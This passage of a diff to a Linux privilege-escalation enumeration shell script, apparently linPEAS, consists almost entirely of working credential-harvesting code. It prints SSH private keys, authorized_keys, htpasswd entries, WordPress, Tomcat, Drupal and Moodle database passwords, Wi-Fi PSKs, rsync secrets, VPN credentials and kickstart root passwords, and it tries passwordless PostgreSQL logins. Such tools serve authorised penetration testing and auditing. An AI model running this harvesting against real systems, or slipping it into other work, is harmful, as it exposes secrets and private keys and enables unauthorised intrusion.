echo_not_found "*.ovpn"; fi; printf "%s" "$PSTORAGE_OPENVPN" | grep -E "\.ovpn$" | while read f; do ls -ld "$f" | sed -${E} "s,\.ovpn$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "auth-user-pass.+" | sed -${E} "s,auth-user-pass.+,${SED_RED},g"; done; echo ""; - - - #-- SI) ssh files - print_2title "Searching ssl/ssh files" - if [ "$PSTORAGE_CERTSB4" ]; then certsb4_grep=$(grep -L "\"\|'\|(" $PSTORAGE_CERTSB4 2>/dev/null); fi - sshconfig="$(ls /etc/ssh/ssh_config 2>/dev/null)" - hostsdenied="$(ls /etc/hosts.denied 2>/dev/null)" - hostsallow="$(ls /etc/hosts.allow 2>/dev/null)" - - print_2title "Analyzing SSH Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"id_dsa.*$\"`" ]; then echo_not_found "id_dsa*"; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "id_dsa.*$" | while read f; do ls -ld "$f" | sed -${E} "s,id_dsa.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"id_rsa.*$\"`" ]; then echo_not_found "id_rsa*"; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "id_rsa.*$" | while read f; do ls -ld "$f" | sed -${E} "s,id_rsa.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"known_hosts$\"`" ]; then echo_not_found "known_hosts"; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "known_hosts$" | while read f; do ls -ld "$f" | sed -${E} "s,known_hosts$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"authorized_hosts$\"`" ]; then echo_not_found "authorized_hosts"; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "authorized_hosts$" | while read f; do ls -ld "$f" | sed -${E} "s,authorized_hosts$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"authorized_keys$\"`" ]; then echo_not_found "authorized_keys"; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "authorized_keys$" | while read f; do ls -ld "$f" | sed -${E} "s,authorized_keys$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,from=[\w\._\-]+,${SED_GOOD},g"; done; echo ""; - - - grep "PermitRootLogin \|ChallengeResponseAuthentication \|PasswordAuthentication \|UsePAM \|Port\|PermitEmptyPasswords\|PubkeyAuthentication\|ListenAddress\|ForwardAgent\|AllowAgentForwarding\|AuthorizedKeysFiles" /etc/ssh/sshd_config 2>/dev/null | grep -v "#" | sed -${E} "s,PermitRootLogin.*es|PermitEmptyPasswords.*es|ChallengeResponseAuthentication.*es|FordwardAgent.*es,${SED_RED}," - - if [ "$TIMEOUT" ]; then - privatekeyfilesetc=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) - privatekeyfileshome=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOMESEARCH 2>/dev/null) - privatekeyfilesroot=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /root 2>/dev/null) - privatekeyfilesmnt=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /mnt 2>/dev/null) - else - privatekeyfilesetc=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) #If there is tons of files linpeas gets frozen here without a timeout - privatekeyfileshome=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOME/.ssh 2>/dev/null) + print_list "PostgreSQL connection to template1 using postgres/NOPASS ........ " + if [ "$(timeout 1 psql -U postgres -d template1 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed "s,.)*,${SED_RED}," + else echo_no fi - if [ "$privatekeyfilesetc" ] || [ "$privatekeyfileshome" ] || [ "$privatekeyfilesroot" ] || [ "$privatekeyfilesmnt" ] ; then - echo "" - print_3title "Possible private SSH keys were found!" | sed -${E} "s,private SSH keys,${SED_RED}," - if [ "$privatekeyfilesetc" ]; then printf "$privatekeyfilesetc\n" | sed -${E} "s,.*,${SED_RED},"; fi - if [ "$privatekeyfileshome" ]; then printf "$privatekeyfileshome\n" | sed -${E} "s,.*,${SED_RED},"; fi - if [ "$privatekeyfilesroot" ]; then printf "$privatekeyfilesroot\n" | sed -${E} "s,.*,${SED_RED},"; fi - if [ "$privatekeyfilesmnt" ]; then printf "$privatekeyfilesmnt\n" | sed -${E} "s,.*,${SED_RED},"; fi - echo "" + print_list "PostgreSQL connection to template0 using pgsql/NOPASS ........... " + if [ "$(timeout 1 psql -U pgsql -d template0 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," + else echo_no fi - if [ "$certsb4_grep" ] || [ "$PSTORAGE_CERTSBIN" ]; then - print_3title "Some certificates were found (out limited):" - printf "$certsb4_grep\n" | head -n 20 - printf "$$PSTORAGE_CERTSBIN\n" | head -n 20 - echo "" - fi - if [ "$PSTORAGE_CERTSCLIENT" ]; then - print_3title "Some client certificates were found:" - printf "$PSTORAGE_CERTSCLIENT\n" - echo "" - fi - if [ "$PSTORAGE_SSH_AGENTS" ]; then - print_3title "Some SSH Agent files were found:" - printf "$PSTORAGE_SSH_AGENTS\n" - echo "" - fi - if ssh-add -l 2>/dev/null | grep -qv 'no identities'; then - print_3title "Listing SSH Agents" - ssh-add -l - echo "" - fi - if [ "$PSTORAGE_SSH_CONFIG" ]; then - print_3title "Some home ssh config file was found" - printf "%s\n" "$PSTORAGE_SSH_CONFIG" | while read f; do ls "$f" | sed -${E} "s,$f,${SED_RED},"; cat "$f" 2>/dev/null | grep -Iv "^$" | grep -v "^#" | sed -${E} "s,User|ProxyCommand,${SED_RED},"; done - echo "" - fi - if [ "$hostsdenied" ]; then - print_3title "/etc/hosts.denied file found, read the rules:" - printf "$hostsdenied\n" - cat "/etc/hosts.denied" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_GREEN}," - echo "" - fi - if [ "$hostsallow" ]; then - print_3title "/etc/hosts.allow file found, trying to read the rules:" - printf "$hostsallow\n" - cat "/etc/hosts.allow" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_RED}," - echo "" - fi - if [ "$sshconfig" ]; then - echo "" - echo "Searching inside /etc/ssh/ssh_config for interesting info" - grep -v "^#" /etc/ssh/ssh_config 2>/dev/null | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed -${E} "s,Host|ForwardAgent|User|ProxyCommand,${SED_RED}," - fi - echo "" - #-- SI) PAM auth - print_2title "Searching unexpected auth lines in /etc/pam.d/sshd" - pamssh=$(grep -v "^#\|^@" /etc/pam.d/sshd 2>/dev/null | grep -i auth) - if [ "$pamssh" ]; then - grep -v "^#\|^@" /etc/pam.d/sshd 2>/dev/null | grep -i auth | sed -${E} "s,.*,${SED_RED}," + print_list "PostgreSQL connection to template1 using pgsql/NOPASS ........... " + if [ "$(timeout 1 psql -U pgsql -d template1 -c 'select version()' 2> /dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," else echo_no fi echo "" +fi - #-- SI) NFS exports - print_2title "NFS exports?" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe" - if [ "$(cat /etc/exports 2>/dev/null)" ]; then grep -v "^#" /etc/exports 2>/dev/null | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,no_root_squash|no_all_squash ,${SED_RED_YELLOW}," | sed -${E} "s,insecure,${SED_RED}," - else echo_not_found "/etc/exports" - fi +if [ "$PSTORAGE_MONGO" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Mongo Files (limit 70)" + echo "Version: $(warn_exec mongo --version 2>/dev/null; warn_exec mongod --version 2>/dev/null)" + if ! [ "`echo \"$PSTORAGE_MONGO\" | grep -E \"mongod.*\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "mongod*.conf"; fi; fi; printf "%s" "$PSTORAGE_MONGO" | grep -E "mongod.*\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,mongod.*\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#"; done; echo ""; +fi + + +if [ "$PSTORAGE_APACHE" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Apache Files (limit 70)" + echo "Version: $(warn_exec apache2 -v 2>/dev/null; warn_exec httpd -v 2>/dev/null)" + print_3title 'PHP exec extensions' + grep -R -B1 "httpd-php" /etc/apache2 2>/dev/null + if ! [ "`echo \"$PSTORAGE_APACHE\" | grep -E \"sites-enabled$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sites-enabled"; fi; fi; printf "%s" "$PSTORAGE_APACHE" | grep -E "sites-enabled$" | while read f; do ls -ld "$f" | sed -${E} "s,sites-enabled$,${SED_RED},"; find "$f" -name "*" | while read ff; do ls -ld "$ff" | sed -${E} "s,.*,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "AuthType|AuthName|AuthUserFile|ServerName|ServerAlias" | grep -Ev "#" | sed -${E} "s,AuthType|AuthName|AuthUserFile|ServerName|ServerAlias,${SED_RED},g"; done; echo "";done; echo ""; + if ! [ "`echo \"$PSTORAGE_APACHE\" | grep -E \"000-default\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "000-default.conf"; fi; fi; printf "%s" "$PSTORAGE_APACHE" | grep -E "000-default\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,000-default\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,AuthType|AuthName|AuthUserFile|ServerName|ServerAlias,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_APACHE\" | grep -E \"php\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "php.ini"; fi; fi; printf "%s" "$PSTORAGE_APACHE" | grep -E "php\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,php\.ini$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E allow_ | grep -Ev "^;" | sed -${E} "s,On,${SED_RED},g"; done; echo ""; +fi + + +if [ "$PSTORAGE_TOMCAT" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Tomcat Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_TOMCAT\" | grep -E \"tomcat-users\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "tomcat-users.xml"; fi; fi; printf "%s" "$PSTORAGE_TOMCAT" | grep -E "tomcat-users\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,tomcat-users\.xml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "username=|password=" | sed -${E} "s,dbtype|dbhost|dbuser|dbhost|dbpass|dbport,${SED_RED},g"; done; echo ""; +fi + + +if [ "$PSTORAGE_FASTCGI" ] || [ "$DEBUG" ]; then + print_2title "Analyzing FastCGI Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_FASTCGI\" | grep -E \"fastcgi_params$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "fastcgi_params"; fi; fi; printf "%s" "$PSTORAGE_FASTCGI" | grep -E "fastcgi_params$" | while read f; do ls -ld "$f" | sed -${E} "s,fastcgi_params$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "DB_NAME|DB_USER|DB_PASS" | sed -${E} "s,DB_NAME|DB_USER|DB_PASS,${SED_RED},g"; done; echo ""; +fi + + +if [ "$PSTORAGE_HTTP_CONF" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Http conf Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_HTTP_CONF\" | grep -E \"httpd\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "httpd.conf"; fi; fi; printf "%s" "$PSTORAGE_HTTP_CONF" | grep -E "httpd\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,httpd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "htaccess.*|htpasswd.*" | grep -Ev "\W+\#|^#" | sed -${E} "s,htaccess.*|htpasswd.*,${SED_RED},g"; done; echo ""; +fi + + +if [ "$PSTORAGE_HTPASSWD" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Htpasswd Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_HTPASSWD\" | grep -E \"\.htpasswd$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".htpasswd"; fi; fi; printf "%s" "$PSTORAGE_HTPASSWD" | grep -E "\.htpasswd$" | while read f; do ls -ld "$f" | sed -${E} "s,\.htpasswd$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; +fi + + +if [ "$PSTORAGE_PHP_SESSIONS" ] || [ "$DEBUG" ]; then + print_2title "Analyzing PHP Sessions Files (limit 70)" + ls /var/lib/php/sessions 2>/dev/null || echo_not_found /var/lib/php/sessions + if ! [ "`echo \"$PSTORAGE_PHP_SESSIONS\" | grep -E \"sess_.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sess_*"; fi; fi; printf "%s" "$PSTORAGE_PHP_SESSIONS" | grep -E "sess_.*$" | while read f; do ls -ld "$f" | sed -${E} "s,sess_.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; +fi + + +if [ "$PSTORAGE_WORDPRESS" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Wordpress Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_WORDPRESS\" | grep -E \"wp-config\.php$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "wp-config.php"; fi; fi; printf "%s" "$PSTORAGE_WORDPRESS" | grep -E "wp-config\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,wp-config\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "PASSWORD|USER|NAME|HOST" | sed -${E} "s,PASSWORD|USER|NAME|HOST,${SED_RED},g"; done; echo ""; +fi + + +if [ "$PSTORAGE_DRUPAL" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Drupal Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_DRUPAL\" | grep -E \"settings\.php$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "settings.php"; fi; fi; printf "%s" "$PSTORAGE_DRUPAL" | grep -E "settings\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,settings\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "drupal_hash_salt|'database'|'username'|'password'|'host'|'port'|'driver'|'prefix'" | sed -${E} "s,drupal_hash_salt|'database'|'username'|'password'|'host'|'port'|'driver'|'prefix',${SED_RED},g"; done; echo ""; +fi + + +if [ "$PSTORAGE_MOODLE" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Moodle Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_MOODLE\" | grep -E \"config\.php$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "config.php"; fi; fi; printf "%s" "$PSTORAGE_MOODLE" | grep -E "config\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,config\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "dbtype|dbhost|dbuser|dbhost|dbpass|dbport" | sed -${E} "s,dbtype|dbhost|dbuser|dbhost|dbpass|dbport,${SED_RED},g"; done; echo ""; +fi + + +if [ "$PSTORAGE_SUPERVISORD" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Supervisord Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_SUPERVISORD\" | grep -E \"supervisord\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "supervisord.conf"; fi; fi; printf "%s" "$PSTORAGE_SUPERVISORD" | grep -E "supervisord\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,supervisord\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "port.*=|username.*=|password.*=" | sed -${E} "s,port.*=|username.*=|password.*=,${SED_RED},g"; done; echo ""; +fi + + +if [ "$PSTORAGE_CESI" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Cesi Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_CESI\" | grep -E \"cesi\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "cesi.conf"; fi; fi; printf "%s" "$PSTORAGE_CESI" | grep -E "cesi\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,cesi\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "username.*=|password.*=|host.*=|port.*=|database.*=" | sed -${E} "s,username.*=|password.*=|host.*=|port.*=|database.*=,${SED_RED},g"; done; echo ""; +fi + + +if [ "$PSTORAGE_RSYNC" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Rsync Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_RSYNC\" | grep -E \"rsyncd\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "rsyncd.conf"; fi; fi; printf "%s" "$PSTORAGE_RSYNC" | grep -E "rsyncd\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,rsyncd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,secrets.*|auth.*users.*=,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_RSYNC\" | grep -E \"rsyncd\.secrets$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "rsyncd.secrets"; fi; fi; printf "%s" "$PSTORAGE_RSYNC" | grep -E "rsyncd\.secrets$" | while read f; do ls -ld "$f" | sed -${E} "s,rsyncd\.secrets$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; +fi + + +if [ "$PSTORAGE_HOSTAPD" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Hostapd Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_HOSTAPD\" | grep -E \"hostapd\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "hostapd.conf"; fi; fi; printf "%s" "$PSTORAGE_HOSTAPD" | grep -E "hostapd\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,hostapd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,passphrase.*,${SED_RED},g"; done; echo ""; +fi + + +if [ "$PSTORAGE_WIFI_CONNECTIONS" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Wifi Connections Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_WIFI_CONNECTIONS\" | grep -E \"system-connections$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "system-connections"; fi; fi; printf "%s" "$PSTORAGE_WIFI_CONNECTIONS" | grep -E "system-connections$" | while read f; do ls -ld "$f" | sed -${E} "s,system-connections$,${SED_RED},"; find "$f" -name "*" | while read ff; do ls -ld "$ff" | sed -${E} "s,.*,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "psk.*" | sed -${E} "s,psk.*,${SED_RED},g"; done; echo "";done; echo ""; +fi + + +if [ "$PSTORAGE_ANACONDA_KS" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Anaconda ks Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_ANACONDA_KS\" | grep -E \"anaconda-ks\.cfg$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "anaconda-ks.cfg"; fi; fi; printf "%s" "$PSTORAGE_ANACONDA_KS" | grep -E "anaconda-ks\.cfg$" | while read f; do ls -ld "$f" | sed -${E} "s,anaconda-ks\.cfg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "rootpw.*" | sed -${E} "s,rootpw.*,${SED_RED},g"; done; echo ""; +fi + + +if [ "$PSTORAGE_VNC" ] || [ "$DEBUG" ]; then + print_2title "Analyzing VNC Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"\.vnc$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".vnc"; fi; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "\.vnc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.vnc$,${SED_RED},"; find "$f" -name "passwd" | while read ff; do ls -ld "$ff" | sed -${E} "s,passwd,${SED_RED},"; done; echo "";done; echo ""; + if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.c.*nf.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*vnc*.c*nf*"; fi; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.c.*nf.*$" | while read f; do ls -ld "$f" | sed -${E} "s,vnc.*\.c.*nf.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*vnc*.ini"; fi; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,vnc.*\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.txt$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*vnc*.txt"; fi; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.txt$" | while read f; do ls -ld "$f" | sed -${E} "s,vnc.*\.txt$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*vnc*.xml"; fi; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,vnc.*\.xml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; +fi + + +if [ "$PSTORAGE_OPENVPN" ] || [ "$DEBUG" ]; then + print_2title "Analyzing OpenVPN Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_OPENVPN\" | grep -E \"\.ovpn$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.ovpn"; fi; fi; printf "%s" "$PSTORAGE_OPENVPN" | grep -E "\.ovpn$" | while read f; do ls -ld "$f" | sed -${E} "s,\.ovpn$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "auth-user-pass.+" | sed -${E} "s,auth-user-pass.+,${SED_RED},g"; done; echo ""; +fi + + +if [ "$PSTORAGE_LDAP" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Ldap Files (limit 70)" + echo "The password hash is from the {SSHA} to 'structural'" + if ! [ "`echo \"$PSTORAGE_LDAP\" | grep -E \"ldap$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ldap"; fi; fi; printf "%s" "$PSTORAGE_LDAP" | grep -E "ldap$" | while read f; do ls -ld "$f" | sed -${E} "s,ldap$,${SED_RED},"; find "$f" -name "*.bdb" | while read ff; do ls -ld "$ff" | sed -${E} "s,.bdb,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E -i -a -o "description.*" | sort | uniq | sed -${E} "s,administrator|password|ADMINISTRATOR|PASSWORD|Password|Administrator,${SED_RED},g"; done; echo "";done; echo ""; +fi + + +if [ "$PSTORAGE_LOG4SHELL" ] || [ "$DEBUG" ]; then + print_2title "Searching Log4Shell vulnerable libraries" + printf "%s\n" "$PSTORAGE_LOG4SHELL" | while read f; do + echo "$f" | grep -E "log4j\-core\-(1\.[^0]|2\.[0-9][^0-9]|2\.1[0-6])" | sed -${E} "s,log4j\-core\-(1\.[^0]|2\.[0-9][^0-9]|2\.1[0-6]),${SED_RED},"; + done echo "" +fi - #-- SI) Kerberos +#-- SI) ssh files +print_2title "Searching ssl/ssh files" +if [ "$PSTORAGE_CERTSB4" ]; then certsb4_grep=$(grep -L "\"\|'\|(" $PSTORAGE_CERTSB4 2>/dev/null); fi +sshconfig="$(ls /etc/ssh/ssh_config 2>/dev/null)" +hostsdenied="$(ls /etc/hosts.denied 2>/dev/null)" +hostsallow="$(ls /etc/hosts.allow 2>/dev/null)" +writable_agents=$(find $folder_path -type s -name "agent.*" -or -name "*gpg-agent*" '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')') + +if [ "$PSTORAGE_SSH" ] || [ "$DEBUG" ]; then + print_2title "Analyzing SSH Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"id_dsa.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "id_dsa*"; fi; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "id_dsa.*$" | while read f; do ls -ld "$f" | sed -${E} "s,id_dsa.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"id_rsa.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "id_rsa*"; fi; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "id_rsa.*$" | while read f; do ls -ld "$f" | sed -${E} "s,id_rsa.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"known_hosts$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "known_hosts"; fi; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "known_hosts$" | while read f; do ls -ld "$f" | sed -${E} "s,known_hosts$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"authorized_hosts$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "authorized_hosts"; fi; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "authorized_hosts$" | while read f; do ls -ld "$f" | sed -${E} "s,authorized_hosts$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"authorized_keys$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "authorized_keys"; fi; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "authorized_keys$" | while read f; do ls -ld "$f" | sed -${E} "s,authorized_keys$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,from=[\w\._\-]+,${SED_GOOD},g"; done; echo ""; +fi + + +grep "PermitRootLogin \|ChallengeResponseAuthentication \|PasswordAuthentication \|UsePAM \|Port\|PermitEmptyPasswords\|PubkeyAuthentication\|ListenAddress\|ForwardAgent\|AllowAgentForwarding\|AuthorizedKeysFiles" /etc/ssh/sshd_config 2>/dev/null | grep -v "#" | sed -${E} "s,PermitRootLogin.*es|PermitEmptyPasswords.*es|ChallengeResponseAuthentication.*es|FordwardAgent.*es,${SED_RED}," + +if [ "$TIMEOUT" ]; then + privatekeyfilesetc=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) + privatekeyfileshome=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOMESEARCH 2>/dev/null) + privatekeyfilesroot=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /root 2>/dev/null) + privatekeyfilesmnt=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /mnt 2>/dev/null) +else + privatekeyfilesetc=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) #If there is tons of files linpeas gets frozen here without a timeout + privatekeyfileshome=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOME/.ssh 2>/dev/null) +fi + +if [ "$privatekeyfilesetc" ] || [ "$privatekeyfileshome" ] || [ "$privatekeyfilesroot" ] || [ "$privatekeyfilesmnt" ] ; then + echo "" + print_3title "Possible private SSH keys were found!" | sed -${E} "s,private SSH keys,${SED_RED}," + if [ "$privatekeyfilesetc" ]; then printf "$privatekeyfilesetc\n" | sed -${E} "s,.*,${SED_RED},"; fi + if [ "$privatekeyfileshome" ]; then printf "$privatekeyfileshome\n" | sed -${E} "s,.*,${SED_RED},"; fi + if [ "$privatekeyfilesroot" ]; then printf "$privatekeyfilesroot\n" | sed -${E} "s,.*,${SED_RED},"; fi + if [ "$privatekeyfilesmnt" ]; then printf "$privatekeyfilesmnt\n" | sed -${E} "s,.*,${SED_RED},"; fi + echo "" +fi +if [ "$certsb4_grep" ] || [ 